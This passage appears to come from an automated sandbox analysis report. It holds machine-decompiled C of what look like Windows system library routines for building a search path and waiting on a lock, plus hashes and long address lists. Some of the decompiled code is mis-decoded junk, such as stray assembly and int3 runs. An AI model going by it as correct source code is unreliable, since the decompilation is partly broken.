} 					goto L6; 				} 				L2: 				_push( *((intOrPtr*)(_t114 + 8))); 				
_push(_t106); 				if(E010FA890() != 0) { 					goto L6; 				} 				goto L3; 			}                        


                                                                            APIs
                                                                            • _vswprintf_s.LIBCMT ref: 011148AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: _vswprintf_s
                                                                            • String ID:
                                                                            • API String ID: 677850445-0
                                                                            • Opcode ID: 80562f494f45266f3b60def16d70441d7437499eb52d7599eea860a5905d0e47
                                                                            • Instruction ID: d2f48aa4f59eecc71350ca58549a78c50c9a3d24f26a07fef2d96957423411c2
                                                                            • Opcode Fuzzy Hash: 80562f494f45266f3b60def16d70441d7437499eb52d7599eea860a5905d0e47
                                                                            • Instruction Fuzzy Hash: E651D371D002598FEF39CFA8C845BEEBBB1AF04B10F1041BDD999ABA86D7704941CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                                                                                  E010E2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) { 				signed int _v8; 				signed int _v16; 				unsigned int _v24; 				void* _v28; 				signed int _v32; 				unsigned int _v36; 				void* _v37; 				signed int _v40; 				signed int _v44; 				signed int _v48; 				signed int _v52; 				signed int _v56; 				intOrPtr _v60; 				signed int _v64; 				signed int _v68; 				signed int _v72; 				signed int _v76; 				signed int _v80; 				signed int _t240; 				signed int _t244; 				void* _t245; 				signed int _t251; 				signed int _t253; 				intOrPtr _t255; 				signed int _t258; 				signed int _t265; 				signed int _t268; 				signed int _t276; 				intOrPtr _t282; 				signed int _t284; 				signed int _t286; 				void* _t287; 				signed int _t288; 				signed int _t289; 				unsigned int _t292; 				signed int _t296; 				void* _t297; 				signed int _t298; 				signed int _t302; 				intOrPtr _t314; 				signed int _t323; 				signed int _t325; 				signed int _t326; 				signed int _t330; 				signed int _t331; 				signed int _t333; 				signed int _t335; 				signed int _t337; 				void* _t338; 				void* _t340; 				void* _t341;  				_t335 = _t337; 				_t338 = _t337 - 0x4c; 				_v8 =  *0x11ad360 ^ _t335; 				_push(__ebx); 				_push(__esi); 				_push(__edi); 				_t330 = 0x11ab2e8; 				_v56 = _a4; 				_v48 = __edx; 				_v60 = __ecx; 				_t292 = 0; 				_v80 = 0; 				asm("movsd"); 				_v64 = 0; 				_v76 = 0; 				_v72 = 0; 				asm("movsd"); 				_v44 = 0; 				_v52 = 0; 				_v68 = 0; 				asm("movsd"); 				_v32 = 0; 				_v36 = 0; 				asm("movsd"); 				_v16 = 0; 				_t341 = (_v24 >> 0x0000001c & 0x00000003) - 1; 				_t282 = 0x48; 				_t312 = 0 | _t341 == 0x00000000; 				_t323 = 0; 				_v37 = _t341 == 0; 				if(_v48 <= 0) { 					L16: 					_t45 = 
_t282 - 0x48; // 0x0 					__eflags = _t45 - 0xfffe; 					if(_t45 > 0xfffe) { 						_t331 = 0xc0000106; 						goto L32; 					} else { 						_t330 = L010D4620(_t292,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t282); 						_v52 = _t330; 						__eflags = _t330; 						if(_t330 == 0) { 							_t331 = 0xc0000017; 							goto L32; 						} else { 							 *(_t330 + 0x44) =  *(_t330 + 0x44) & 0x00000000; 							_t50 = _t330 + 0x48; // 0x48 							_t325 = _t50; 							_t312 = _v32; 							 *((intOrPtr*)(_t330 + 0x3c)) = _t282; 							_t284 = 0; 							 *((short*)(_t330 + 0x30)) = _v48; 							__eflags = _t312; 							if(_t312 != 0) { 								 *(_t330 + 0x18) = _t325; 								__eflags = _t312 - 0x11a8478; 								 *_t330 = ((0 | _t312 == 0x011a8478) - 0x00000001 & 0xfffffffb) + 7; 								E010FF3E0(_t325,  *((intOrPtr*)(_t312 + 4)),  *_t312 & 0x0000ffff); 								_t312 = _v32; 								_t338 = _t338 + 0xc; 								_t284 = 1; 								__eflags = _a8; 								_t325 = _t325 + (( *_t312 & 0x0000ffff) >> 1) * 2; 								if(_a8 != 0) { 									_t276 = E011439F2(_t325); 									_t312 = _v32; 									_t325 = _t276; 								} 							} 							_t296 = 0; 							_v16 = 0; 							__eflags = _v48; 							if(_v48 <= 0) { 								L31: 								_t331 = _v68; 								__eflags = 0; 								 *((short*)(_t325 - 2)) = 0; 								goto L32; 							} else { 								_t286 = _t330 + _t284 * 4; 								_v56 = _t286; 								do { 									__eflags = _t312; 									if(_t312 != 0) { 										_t240 =  *(_v60 + _t296 * 4); 										__eflags = _t240; 										if(_t240 == 0) { 											goto L30; 										} else { 											__eflags = _t240 == 5; 											if(_t240 == 5) { 												goto L30; 											} else { 												goto L22; 											} 										} 									} else { 										L22: 										 *_t286 =  *(_v60 + _t296 * 4); 										 *(_t286 + 0x18) = _t325; 										_t244 =  *(_v60 + _t296 * 4); 										__eflags = _t244 - 8; 										if(_t244 > 8) { 											goto L56; 										} else { 		
									switch( *((intOrPtr*)(_t244 * 4 +  &M010E2959))) { 												case 0: 													__ax =  *0x11a8488; 													__eflags = __ax; 													if(__ax == 0) { 														goto L29; 													} else { 														__ax & 0x0000ffff = E010FF3E0(__edi,  *0x11a848c, __ax & 0x0000ffff); 														__eax =  *0x11a8488 & 0x0000ffff; 														goto L26; 													} 													goto L108; 												case 1: 													L45: 													E010FF3E0(_t325, _v80, _v64); 													_t271 = _v64; 													goto L26; 												case 2: 													 *0x11a8480 & 0x0000ffff = E010FF3E0(__edi,  *0x11a8484,  *0x11a8480 & 0x0000ffff); 													__eax =  *0x11a8480 & 0x0000ffff; 													__eax = ( *0x11a8480 & 0x0000ffff) >> 1; 													__edi = __edi + __eax * 2; 													goto L28; 												case 3: 													__eax = _v44; 													__eflags = __eax; 													if(__eax == 0) { 														goto L29; 													} else { 														__esi = __eax + __eax; 														__eax = E010FF3E0(__edi, _v72, __esi); 														__edi = __edi + __esi; 														__esi = _v52; 														goto L27; 													} 													goto L108; 												case 4: 													_push(0x2e); 													_pop(__eax); 													 *(__esi + 0x44) = __edi; 													 *__edi = __ax; 													__edi = __edi + 4; 													_push(0x3b); 													_pop(__eax); 													 *(__edi - 2) = __ax; 													goto L29; 												case 5: 													__eflags = _v36; 													if(_v36 == 0) { 														goto L45; 													} else { 														E010FF3E0(_t325, _v76, _v36); 														_t271 = _v36; 													} 													L26: 													_t338 = _t338 + 0xc; 													_t325 = _t325 + (_t271 >> 1) * 2 + 2; 													__eflags = _t325; 													L27: 													_push(0x3b); 													_pop(_t273); 													 *((short*)(_t325 - 2)) = _t273; 													goto L28; 												case 6: 													
__ebx = "\\Wow\\Wow"; 													__eflags = __ebx - "\\Wow\\Wow"; 													if(__ebx != "\\Wow\\Wow") { 														_push(0x3b); 														_pop(__esi); 														do { 															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa; 															E010FF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff; 															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1; 															__edi = __edi + __eax * 2; 															__edi = __edi + 2; 															 *(__edi - 2) = __si; 															__ebx =  *__ebx; 															__eflags = __ebx - "\\Wow\\Wow"; 														} while (__ebx != "\\Wow\\Wow"); 														__esi = _v52; 														__ecx = _v16; 														__edx = _v32; 													} 													__ebx = _v56; 													goto L29; 												case 7: 													 *0x11a8478 & 0x0000ffff = E010FF3E0(__edi,  *0x11a847c,  *0x11a8478 & 0x0000ffff); 													__eax =  *0x11a8478 & 0x0000ffff; 													__eax = ( *0x11a8478 & 0x0000ffff) >> 1; 													__eflags = _a8; 													__edi = __edi + __eax * 2; 													if(_a8 != 0) { 														__ecx = __edi; 														__eax = E011439F2(__ecx); 														__edi = __eax; 													} 													goto L28; 												case 8: 													__eax = 0; 													 *(__edi - 2) = __ax; 													 *0x11a6e58 & 0x0000ffff = E010FF3E0(__edi,  *0x11a6e5c,  *0x11a6e58 & 0x0000ffff); 													 *(__esi + 0x38) = __edi; 													__eax =  *0x11a6e58 & 0x0000ffff; 													__eax = ( *0x11a6e58 & 0x0000ffff) >> 1; 													__edi = __edi + __eax * 2; 													__edi = __edi + 2; 													L28: 													_t296 = _v16; 													_t312 = _v32; 													L29: 													_t286 = _t286 + 4; 													__eflags = _t286; 													_v56 = _t286; 													goto L30; 											} 										} 									} 									goto L108; 									L30: 									_t296 = _t296 + 1; 									_v16 = _t296; 									__eflags = _t296 - _v48; 								} 
while (_t296 < _v48); 								goto L31; 							} 						} 					} 				} else { 					while(1) { 						L1: 						_t244 =  *(_v60 + _t323 * 4); 						if(_t244 > 8) { 							break; 						} 						switch( *((intOrPtr*)(_t244 * 4 +  &M010E2935))) { 							case 0: 								__ax =  *0x11a8488; 								__eflags = __ax; 								if(__ax != 0) { 									__eax = __ax & 0x0000ffff; 									__ebx = __ebx + 2; 									__eflags = __ebx; 									goto L53; 								} 								goto L14; 							case 1: 								L44: 								_t312 =  &_v64; 								_v80 = E010E2E3E(0,  &_v64); 								_t282 = _t282 + _v64 + 2; 								goto L13; 							case 2: 								__eax =  *0x11a8480 & 0x0000ffff; 								__ebx = __ebx + __eax; 								__eflags = __dl; 								if(__dl != 0) { 									__eax = 0x11a8480; 									goto L80; 								} 								goto L14; 							case 3: 								__eax = E010CEEF0(0x11a79a0); 								__eax =  &_v44; 								_push(__eax); 								_push(0); 								_push(0); 								_push(4); 								_push(L"PATH"); 								_push(0); 								L57(); 								__esi = __eax; 								_v68 = __esi; 								__eflags = __esi - 0xc0000023; 								if(__esi != 0xc0000023) { 									L10: 									__eax = E010CEB70(__ecx, 0x11a79a0); 									__eflags = __esi - 0xc0000100; 									if(__esi == 0xc0000100) { 										_v44 = _v44 & 0x00000000; 										__eax = 0; 										_v68 = 0; 										goto L13; 									} else { 										__eflags = __esi; 										if(__esi < 0) { 											L32: 											_t218 = _v72; 											__eflags = _t218; 											if(_t218 != 0) { 												L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218); 											} 											_t219 = _v52; 											__eflags = _t219; 											if(_t219 != 0) { 												__eflags = _t331; 												if(_t331 < 0) { 													L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219); 													_t219 = 0; 												} 											} 											goto L36; 										} else { 											__eax = _v44; 											__ebx = __ebx + __eax * 
2; 											__ebx = __ebx + 2; 											__eflags = __ebx; 											L13: 											_t292 = _v36; 											goto L14; 										} 									} 								} else { 									__eax = _v44; 									__ecx =  *0x11a7b9c; // 0x0 									_v44 + _v44 =  *[fs:0x30]; 									__ecx = __ecx + 0x180000; 									__eax = L010D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]); 									_v72 = __eax; 									__eflags = __eax; 									if(__eax == 0) { 										__eax = E010CEB70(__ecx, 0x11a79a0); 										__eax = _v52; 										L36: 										_pop(_t324); 										_pop(_t332); 										__eflags = _v8 ^ _t335; 										_pop(_t283); 										return E010FB640(_t219, _t283, _v8 ^ _t335, _t312, _t324, _t332); 									} else { 										__ecx =  &_v44; 										_push(__ecx); 										_push(_v44); 										_push(__eax); 										_push(4); 										_push(L"PATH"); 										_push(0); 										L57(); 										__esi = __eax; 										_v68 = __eax; 										goto L10; 									} 								} 								goto L108; 							case 4: 								__ebx = __ebx + 4; 								goto L14; 							case 5: 								_t278 = _v56; 								if(_v56 != 0) { 									_t312 =  &_v36; 									_t280 = E010E2E3E(_t278,  &_v36); 									_t292 = _v36; 									_v76 = _t280; 								} 								if(_t292 == 0) { 									goto L44; 								} else { 									_t282 = _t282 + 2 + _t292; 								} 								goto L14; 							case 6: 								__eax =  *0x11a5764 & 0x0000ffff; 								goto L53; 							case 7: 								__eax =  *0x11a8478 & 0x0000ffff; 								__ebx = __ebx + __eax; 								__eflags = _a8; 								if(_a8 != 0) { 									__ebx = __ebx + 0x16; 									__ebx = __ebx + __eax; 								} 								__eflags = __dl; 								if(__dl != 0) { 									__eax = 0x11a8478; 									L80: 									_v32 = __eax; 								} 								goto L14; 							case 8: 								__eax =  *0x11a6e58 & 0x0000ffff; 								__eax = ( *0x11a6e58 & 0x0000ffff) + 2; 								L53: 								__ebx = __ebx + __eax; 								L14: 								
_t323 = _t323 + 1; 								if(_t323 >= _v48) { 									goto L16; 								} else { 									_t312 = _v37; 									goto L1; 								} 								goto L108; 						} 					} 					L56: 					_t297 = 0x25; 					asm("int 0x29"); 					asm("out 0x28, al"); 					_push(cs); 					 *((intOrPtr*)(_t330 + 0x28)) =  *((intOrPtr*)(_t330 + 0x28)) + _t338; 					_push(cs); 					_t245 = _t244 + _t338; 					asm("daa"); 					_push(cs); 					 *_t330 =  *_t330 + _t335; 					_push(cs); 					 *((intOrPtr*)(_t330 + 0x28)) =  *((intOrPtr*)(_t330 + 0x28)) + _t245; 					 *0x1f010e26 =  *0x1f010e26 + _t245; 					_t287 = cs; 					asm("adc al, [ecx]"); 					_t246 = _t338; 					_t340 = _t245; 					 *_t330 =  *_t330 - _t297; 					 *0x201125b =  *0x201125b + _t330; 					 *_t330 =  *_t330 - _t297; 					 *((intOrPtr*)(_t246 - 0x9fef1d8)) =  *((intOrPtr*)(_t338 - 0x9fef1d8)) + _t338; 					asm("daa"); 					_push(cs); 					 *_t330 =  *_t330 + _t287; 					 *_t330 =  *_t330 - _t297; 					 *((intOrPtr*)(_t330 + 0x28)) =  *((intOrPtr*)(_t330 + 0x28)) + _t297; 					_push(cs); 					_a35 = _a35 + _t287; 					_t288 = cs; 					asm("adc al, [ecx]"); 					_push(cs); 					 *((intOrPtr*)(_t340 + _t288 * 2)) =  *((intOrPtr*)(_t340 + _t288 * 2)) + _t330; 					asm("adc al, [ecx]"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					_push(0x20); 					_push(0x118ff00); 					E0110D08C(_t288, _t325, _t330); 					_v44 =  *[fs:0x18]; 					_t326 = 0; 					 *_a24 = 0; 					_t289 = _a12; 					__eflags = _t289; 					if(_t289 == 0) { 						_t251 = 0xc0000100; 					} else { 						_v8 = 0; 						_t333 = 0xc0000100; 						_v52 = 0xc0000100; 						_t253 = 4; 						while(1) { 							_v40 = _t253; 							__eflags = _t253; 							if(_t253 == 0) { 						
		break; 							} 							_t302 = _t253 * 0xc; 							_v48 = _t302; 							__eflags = _t289 -  *((intOrPtr*)(_t302 + 0x1091664)); 							if(__eflags <= 0) { 								if(__eflags == 0) { 									_t268 = E010FE5C0(_a8,  *((intOrPtr*)(_t302 + 0x1091668)), _t289); 									_t340 = _t340 + 0xc; 									__eflags = _t268; 									if(__eflags == 0) { 										_t333 = E011351BE(_t289,  *((intOrPtr*)(_v48 + 0x109166c)), _a16, _t326, _t333, __eflags, _a20, _a24); 										_v52 = _t333; 										break; 									} else { 										_t253 = _v40; 										goto L62; 									} 									goto L70; 								} else { 									L62: 									_t253 = _t253 - 1; 									continue; 								} 							} 							break; 						} 						_v32 = _t333; 						__eflags = _t333; 						if(_t333 < 0) { 							__eflags = _t333 - 0xc0000100; 							if(_t333 == 0xc0000100) { 								_t298 = _a4; 								__eflags = _t298; 								if(_t298 != 0) { 									_v36 = _t298; 									__eflags =  *_t298 - _t326; 									if( *_t298 == _t326) { 										_t333 = 0xc0000100; 										goto L76; 									} else { 										_t314 =  *((intOrPtr*)(_v44 + 0x30)); 										_t255 =  *((intOrPtr*)(_t314 + 0x10)); 										__eflags =  *((intOrPtr*)(_t255 + 0x48)) - _t298; 										if( *((intOrPtr*)(_t255 + 0x48)) == _t298) { 											__eflags =  *(_t314 + 0x1c); 											if( *(_t314 + 0x1c) == 0) { 												L106: 												_t333 = E010E2AE4( &_v36, _a8, _t289, _a16, _a20, _a24); 												_v32 = _t333; 												__eflags = _t333 - 0xc0000100; 												if(_t333 != 0xc0000100) { 													goto L69; 												} else { 													_t326 = 1; 													_t298 = _v36; 													goto L75; 												} 											} else { 												_t258 = E010C6600( *(_t314 + 0x1c)); 												__eflags = _t258; 												if(_t258 != 0) { 													goto L106; 												} else { 													_t298 = _a4; 													goto L75; 												} 											} 										} else { 											L75: 											_t333 = 
E010E2C50(_t298, _a8, _t289, _a16, _a20, _a24, _t326); 											L76: 											_v32 = _t333; 											goto L69; 										} 									} 									goto L108; 								} else { 									E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c))); 									_v8 = 1; 									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48)); 									_t333 = _a24; 									_t265 = E010E2AE4( &_v36, _a8, _t289, _a16, _a20, _t333); 									_v32 = _t265; 									__eflags = _t265 - 0xc0000100; 									if(_t265 == 0xc0000100) { 										_v32 = E010E2C50(_v36, _a8, _t289, _a16, _a20, _t333, 1); 									} 									_v8 = _t326; 									E010E2ACB(); 								} 							} 						} 						L69: 						_v8 = 0xfffffffe; 						_t251 = _t333; 					} 					L70: 					return E0110D0D1(_t251); 				} 				L108: 			}                        

                                                                            0x010e268b
                                                                            0x010e268e
                                                                            0x010e268f
                                                                            0x010e2691
                                                                            0x010e2696
                                                                            0x010e2698
                                                                            0x010e269d
                                                                            0x010e269f
                                                                            0x00000000
                                                                            0x010e269f
                                                                            0x010e2681
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2846
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2605
                                                                            0x010e260a
                                                                            0x010e260c
                                                                            0x010e2611
                                                                            0x010e2616
                                                                            0x010e2619
                                                                            0x010e2619
                                                                            0x010e261e
                                                                            0x00000000
                                                                            0x010e2624
                                                                            0x010e2627
                                                                            0x010e2627
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01125b1f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2894
                                                                            0x010e289b
                                                                            0x010e289d
                                                                            0x010e28a1
                                                                            0x01125b2b
                                                                            0x01125b2e
                                                                            0x01125b2e
                                                                            0x010e28a7
                                                                            0x010e28a9
                                                                            0x01125b04
                                                                            0x01125b09
                                                                            0x01125b09
                                                                            0x01125b09
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01125b35
                                                                            0x01125b3c
                                                                            0x010e28fb
                                                                            0x010e28fb
                                                                            0x010e26cc
                                                                            0x010e26cc
                                                                            0x010e26d0
                                                                            0x00000000
                                                                            0x010e26d2
                                                                            0x010e26d2
                                                                            0x00000000
                                                                            0x010e26d2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e25fe
                                                                            0x010e292d
                                                                            0x010e292f
                                                                            0x010e2930
                                                                            0x010e2935
                                                                            0x010e2937
                                                                            0x010e2938
                                                                            0x010e293b
                                                                            0x010e293c
                                                                            0x010e293e
                                                                            0x010e293f
                                                                            0x010e2940
                                                                            0x010e2942
                                                                            0x010e2944
                                                                            0x010e2948
                                                                            0x010e294e
                                                                            0x010e294f
                                                                            0x010e2951
                                                                            0x010e2951
                                                                            0x010e2952
                                                                            0x010e2954
                                                                            0x010e295a
                                                                            0x010e295c
                                                                            0x010e2962
                                                                            0x010e2963
                                                                            0x010e2964
                                                                            0x010e2966
                                                                            0x010e2968
                                                                            0x010e296b
                                                                            0x010e296c
                                                                            0x010e2972
                                                                            0x010e2973
                                                                            0x010e2977
                                                                            0x010e2978
                                                                            0x010e297b
                                                                            0x010e297d
                                                                            0x010e297e
                                                                            0x010e297f
                                                                            0x010e2980
                                                                            0x010e2981
                                                                            0x010e2982
                                                                            0x010e2983
                                                                            0x010e2984
                                                                            0x010e2985
                                                                            0x010e2986
                                                                            0x010e2987
                                                                            0x010e2988
                                                                            0x010e2989
                                                                            0x010e298a
                                                                            0x010e298b
                                                                            0x010e298c
                                                                            0x010e298d
                                                                            0x010e298e
                                                                            0x010e298f
                                                                            0x010e2990
                                                                            0x010e2992
                                                                            0x010e2997
                                                                            0x010e29a3
                                                                            0x010e29a6
                                                                            0x010e29ab
                                                                            0x010e29ad
                                                                            0x010e29b0
                                                                            0x010e29b2
                                                                            0x01125c80
                                                                            0x010e29b8
                                                                            0x010e29b8
                                                                            0x010e29bb
                                                                            0x010e29c0
                                                                            0x010e29c5
                                                                            0x010e29c6
                                                                            0x010e29c6
                                                                            0x010e29c9
                                                                            0x010e29cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e29cd
                                                                            0x010e29d0
                                                                            0x010e29d9
                                                                            0x010e29db
                                                                            0x010e29dd
                                                                            0x010e2a7f
                                                                            0x010e2a84
                                                                            0x010e2a87
                                                                            0x010e2a89
                                                                            0x01125ca1
                                                                            0x01125ca3
                                                                            0x00000000
                                                                            0x010e2a8f
                                                                            0x010e2a8f
                                                                            0x00000000
                                                                            0x010e2a8f
                                                                            0x00000000
                                                                            0x010e29e3
                                                                            0x010e29e3
                                                                            0x010e29e3
                                                                            0x00000000
                                                                            0x010e29e3
                                                                            0x010e29dd
                                                                            0x00000000
                                                                            0x010e29db
                                                                            0x010e29e6
                                                                            0x010e29e9
                                                                            0x010e29eb
                                                                            0x010e29ed
                                                                            0x010e29f3
                                                                            0x010e29f5
                                                                            0x010e29f8
                                                                            0x010e29fa
                                                                            0x010e2a97
                                                                            0x010e2a9a
                                                                            0x010e2a9d
                                                                            0x010e2add
                                                                            0x00000000
                                                                            0x010e2a9f
                                                                            0x010e2aa2
                                                                            0x010e2aa5
                                                                            0x010e2aa8
                                                                            0x010e2aab
                                                                            0x01125cab
                                                                            0x01125caf
                                                                            0x01125cc5
                                                                            0x01125cda
                                                                            0x01125cdc
                                                                            0x01125cdf
                                                                            0x01125ce5
                                                                            0x00000000
                                                                            0x01125ceb
                                                                            0x01125ced
                                                                            0x01125cee
                                                                            0x00000000
                                                                            0x01125cee
                                                                            0x01125cb1
                                                                            0x01125cb4
                                                                            0x01125cb9
                                                                            0x01125cbb
                                                                            0x00000000
                                                                            0x01125cbd
                                                                            0x01125cbd
                                                                            0x00000000
                                                                            0x01125cbd
                                                                            0x01125cbb
                                                                            0x010e2ab1
                                                                            0x010e2ab1
                                                                            0x010e2ac4
                                                                            0x010e2ac6
                                                                            0x010e2ac6
                                                                            0x00000000
                                                                            0x010e2ac6
                                                                            0x010e2aab
                                                                            0x00000000
                                                                            0x010e2a00
                                                                            0x010e2a09
                                                                            0x010e2a0e
                                                                            0x010e2a21
                                                                            0x010e2a24
                                                                            0x010e2a35
                                                                            0x010e2a3a
                                                                            0x010e2a3d
                                                                            0x010e2a42
                                                                            0x010e2a59
                                                                            0x010e2a59
                                                                            0x010e2a5c
                                                                            0x010e2a5f
                                                                            0x010e2a5f
                                                                            0x010e29fa
                                                                            0x010e29f3
                                                                            0x010e2a64
                                                                            0x010e2a64
                                                                            0x010e2a6b
                                                                            0x010e2a6b
                                                                            0x010e2a6d
                                                                            0x010e2a72
                                                                            0x010e2a72
                                                                            0x00000000

                                                                            Strings
                                                                            • PATH , xrefs: 010E2642, 010E2691
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: PATH
                                                                            • API String ID: 0-1036084923
                                                                            • Opcode ID: 32302d12cc446551771fc9585a3b25ace97ec2a6d8e0f924eeba7f9967e90272
                                                                            • Instruction ID: 3b719aee70bf641647b35a18d862b68530dba4be48cbc441e8ac5c70561a1e2a
                                                                            • Opcode Fuzzy Hash: 32302d12cc446551771fc9585a3b25ace97ec2a6d8e0f924eeba7f9967e90272
                                                                            • Instruction Fuzzy Hash: 06C19FB1D40219DFDB29DF9AD885BEEBBF9FF48740F484029E581AB250D734A941CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 63%
E010B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
    signed char _v8;
    signed int _v12;
    signed int _v16;
    signed int _v20;
    signed int _v24;
    intOrPtr _v28;
    intOrPtr _v32;
    signed int _v52;
    void* __esi;
    void* __ebp;
    intOrPtr _t55;
    signed int _t57;
    signed int _t58;
    char* _t62;
    signed char* _t63;
    signed char* _t64;
    signed int _t67;
    signed int _t72;
    signed int _t77;
    signed int _t78;
    signed int _t88;
    intOrPtr _t89;
    signed char _t93;
    signed int _t97;
    signed int _t98;
    signed int _t102;
    signed int _t103;
    intOrPtr _t104;
    signed int _t105;
    signed int _t106;
    signed char _t109;
    signed int _t111;
    void* _t116;

    _t102 = __edi;
    _t97 = __edx;
    _v12 = _v12 & 0x00000000;
    _t55 =  *[fs:0x18];
    _t109 = __ecx;
    _v8 = __edx;
    _t86 = 0;
    _v32 = _t55;
    _v24 = 0;
    _push(__edi);
    if(__ecx == 0x11a5350) {
        _t86 = 1;
        _v24 = 1;
         *((intOrPtr*)(_t55 + 0xf84)) = 1;
    }
    _t103 = _t102 | 0xffffffff;
    if( *0x11a7bc8 != 0) {
        _push(0xc000004b);
        _push(_t103);
        E010F97C0();
    }
    if( *0x11a79c4 != 0) {
        _t57 = 0;
    } else {
        _t57 = 0x11a79c8;
    }
    _v16 = _t57;
    if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
        _t93 = _t109;
        L23();
    }
    _t58 =  *_t109;
    if(_t58 == _t103) {
        __eflags =  *(_t109 + 0x14) & 0x01000000;
        _t58 = _t103;
        if(__eflags == 0) {
            _t93 = _t109;
            E010E1624(_t86, __eflags);
            _t58 =  *_t109;
        }
    }
    _v20 = _v20 & 0x00000000;
    if(_t58 != _t103) {
         *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
    }
    _t104 =  *((intOrPtr*)(_t109 + 0x10));
    _t88 = _v16;
    _v28 = _t104;
    L9:
    while(1) {
        if(E010D7D50() != 0) {
            _t62 = ( *[fs:0x30])[0x50] + 0x228;
        } else {
            _t62 = 0x7ffe0382;
        }
        if( *_t62 != 0) {
            _t63 =  *[fs:0x30];
            __eflags = _t63[0x240] & 0x00000002;
            if((_t63[0x240] & 0x00000002) != 0) {
                _t93 = _t109;
                E0114FE87(_t93);
            }
        }
        if(_t104 != 0xffffffff) {
            _push(_t88);
            _push(0);
            _push(_t104);
            _t64 = E010F9520();
            goto L15;
        } else {
            while(1) {
                _t97 =  &_v8;
                _t64 = E010EE18B(_t109 + 4, _t97, 4, _t88, 0);
                if(_t64 == 0x102) {
                    break;
                }
                _t93 =  *(_t109 + 4);
                _v8 = _t93;
                if((_t93 & 0x00000002) != 0) {
                    continue;
                }
                L15:
                if(_t64 == 0x102) {
                    break;
                }
                _t89 = _v24;
                if(_t64 < 0) {
                    L0110DF30(_t93, _t97, _t64);
                    _push(_t93);
                    _t98 = _t97 | 0xffffffff;
                    __eflags =  *0x11a6901;
                    _push(_t109);
                    _v52 = _t98;
                    if( *0x11a6901 != 0) {
                        _push(0);
                        _push(1);
                        _push(0);
                        _push(0x100003);
                        _push( &_v12);
                        _t72 = E010F9980();
                        __eflags = _t72;
                        if(_t72 < 0) {
                            _v12 = _t98 | 0xffffffff;
                        }
                    }
                    asm("lock cmpxchg [ecx], edx");
                    _t111 = 0;
                    __eflags = 0;
                    if(0 != 0) {
                        __eflags = _v12 - 0xffffffff;
                        if(_v12 != 0xffffffff) {
                            _push(_v12);
                            E010F95D0();
                        }
                    } else {
                        _t111 = _v12;
                    }
                    return _t111;
                } else {
                    if(_t89 != 0) {
                         *((intOrPtr*)(_v32 + 0xf84)) = 0;
                        _t77 = E010D7D50();
                        __eflags = _t77;
                        if(_t77 == 0) {
                            _t64 = 0x7ffe0384;
                        } else {
                            _t64 = ( *[fs:0x30])[0x50] + 0x22a;
                        }
                        __eflags =  *_t64;
                        if( *_t64 != 0) {
                            _t64 =  *[fs:0x30];
                            __eflags = _t64[0x240] & 0x00000004;
                            if((_t64[0x240] & 0x00000004) != 0) {
                                _t78 = E010D7D50();
                                __eflags = _t78;
                                if(_t78 == 0) {
                                    _t64 = 0x7ffe0385;
                                } else {
                                    _t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                }
                                __eflags =  *_t64 & 0x00000020;
                                if(( *_t64 & 0x00000020) != 0) {
                                    _t64 = E01137016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                }
                            }
                        }
                    }
                    return _t64;
                }
            }
            _t97 = _t88;
            _t93 = _t109;
            E0114FDDA(_t97, _v12);
            _t105 =  *_t109;
            _t67 = _v12 + 1;
            _v12 = _t67;
            __eflags = _t105 - 0xffffffff;
            if(_t105 == 0xffffffff) {
                _t106 = 0;
                __eflags = 0;
            } else {
                _t106 =  *(_t105 + 0x14);
            }
            __eflags = _t67 - 2;
            if(_t67 > 2) {
                __eflags = _t109 - 0x11a5350;
                if(_t109 != 0x11a5350) {
                    __eflags = _t106 - _v20;
                    if(__eflags == 0) {
                        _t93 = _t109;
                        E0114FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                    }
                }
            }
            _push("RTL: Re-Waiting\n");
            _push(0);
            _push(0x65);
            _v20 = _t106;
